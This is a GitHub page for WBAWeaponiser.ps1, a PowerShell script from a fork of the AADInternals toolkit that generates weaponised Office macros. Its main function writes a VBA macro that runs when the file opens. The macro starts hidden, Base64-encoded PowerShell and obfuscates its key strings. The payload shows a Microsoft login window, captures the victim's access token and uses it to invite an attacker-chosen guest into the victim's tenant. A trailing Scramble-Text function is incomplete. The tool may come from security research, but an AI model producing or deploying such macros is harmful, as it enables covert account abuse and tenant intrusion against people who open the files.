forked from Gerenios/AADInternals
-
Notifications
You must be signed in to change notification settings - Fork 0
/
WBAWeaponiser.ps1
152 lines (125 loc) · 4.56 KB
/
WBAWeaponiser.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
# This script contains functions for weaponising Office files
# Aug 6th 2020
function Generate-InvitationVBA
{
<#
.SYNOPSIS
Creates a VBA script block to weaponise Excel files to invite the given guest user to their tenant.
.DESCRIPTION
Creates a VBA script block to weaponise Excel files to invite the given guest user to their tenant.
The script starts when the Excel workbook is opened:
* Opens an Office 365 login window to get an access token
* Using the access token, sends an invitation for the given email address
Copy the generated script to clipboard and paste to Excel
.Example
New-AADIntInvitationVBA -Email someone@gmail.com | Set-ClipBoard
#>
[cmdletbinding()]
Param(
[Parameter(Mandatory=$True)]
[String]$Email,
[Validateset("Workbook","Document")]
[String]$Type="Workbook"
)
Process
{
#
# Generate the PowerShell code block
#
# First some needed assemblies are imported.
# Second, a Windows form object is created with a web browser control. The Outlook app id is used.
# Third, the login window is shown and access token is fetched
# Finally, the invitation for the given user is sent
$e="`$e=""$Email"";"
$code=@'
Add-Type -AssemblyName System.Windows.Forms;
Add-Type -AssemblyName System.Web;
$r="https://graph.microsoft.com";
$i="d3590ed6-52b3-4102-aeff-aad2292ab01c";
$u="urn:ietf:wg:oauth:2.0:oob";
$l="https://login.microsoftonline.com/common/oauth2/authorize?resource=$r&client_id=$i&response_type=code&haschrome=1&redirect_uri=$u&client-request-id=$((New-Guid).ToString())&prompt=login&scope=openid profile";
$f=[Windows.Forms.Form]::new();
$f.Width=560;
$f.Height=680;
$f.FormBorderStyle=3;
$f.TopMost=$true;
$w=[Windows.Forms.WebBrowser]::new();
$w.Size=$f.ClientSize;
$w.Anchor="Left,Top,Right,Bottom";
$f.Controls.Add($w);
$w.add_Navigated({if($_.Url.ToString().StartsWith($u)){$f.DialogResult="OK";$f.Close();};});
$w.Navigate($l);
if($f.ShowDialog()-ne"OK"){$f.Controls[0].Dispose();return};
$a=[Web.HttpUtility]::ParseQueryString($f.Controls[0].Url.Query);
$b=@{client_id=$i;grant_type="authorization_code";code=$a["code"];redirect_uri=$u};
$f.Controls[0].Dispose();
$c="application/x-www-form-urlencoded";
$o=irm -Uri "https://login.microsoftonline.com/common/oauth2/token" -ContentType $c -Method POST -Body $b;
$b="{""invitedUserEmailAddress"":""$e"",""sendInvitationMessage"":true,""inviteRedirectUrl"":""https://myapps.microsoft.com""}";
$o=irm -Uri "https://graph.microsoft.com/beta/invitations" -Method Post -Body $b -Headers @{"Authorization"="Bearer $($o.access_token)"};
'@
# Convert the code block to Unicode and decode it with Base64
$unicode=[text.encoding]::Unicode.getBytes("$e$code")
$code=[convert]::ToBase64String($unicode)
#
# Create the VBA Code
#
# Generate a random function name
$funcName = -join ((97..122) | Get-Random -Count 32 | % {[char]$_})
$VBA = @"
Private Sub $($Type)_Open()
$funcName
End Sub
Sub $funcName()`n
"@
$p = 1
# Split the Base64 encoded code to shorter chunks
While(($p*500) -lt $code.Length)
{
$codeStr = $($code.Substring(($p-1)*500,500))
#$codeStrArr= $codeStr.ToCharArray()
#[array]::Reverse($codeStrArr)
#$codeStr = -join($codeStrArr)
$VBA += " i$p = ""$codeStr""`n"
$p++
}
$VBA += " i$p = ""$($code.Substring(($p-1)*500,$code.Length-($p-1)*500))""`n"
$VBA += " c1 = Chr(34) & ""pow"" & ""ershel"" & ""l.exe"" & Chr(34)`n"
$VBA += " c2 = ""-EncodedCommand """
for($i=1;$i -lt $p+1 ; $i++)
{
$VBA += " & i$i"
}
$VBA += "`n"
# Set PowerShell to start as hidden
$VBA += " c3 = "" -WindowStyle Hidden""`n"
# Create Wscript.shell object
$VBA += " Set s2 = CreateObject(""Ws"" & ""cript"" & "".s"" & ""hell"")`n"
# Invoke the PowerShell minimized
$VBA += " s2.Run c1 & c2 & c3, 2`n"
$VBA += "End Sub`n"
# Return
$VBA
}
}
function Scramble-Text
{
[cmdletbinding()]
Param(
[Parameter(Mandatory=$True)]
[String]$Text,
[Parameter(Mandatory=$True)]
[String]$Secret
)
Process
{
$secretArray=$Secret.ToCharArray()
$num=0
foreach($char in $secretArray)
{
$num+=$char
}
$num = $num % 256
$textArray = $Text.ToCharArray()
}
}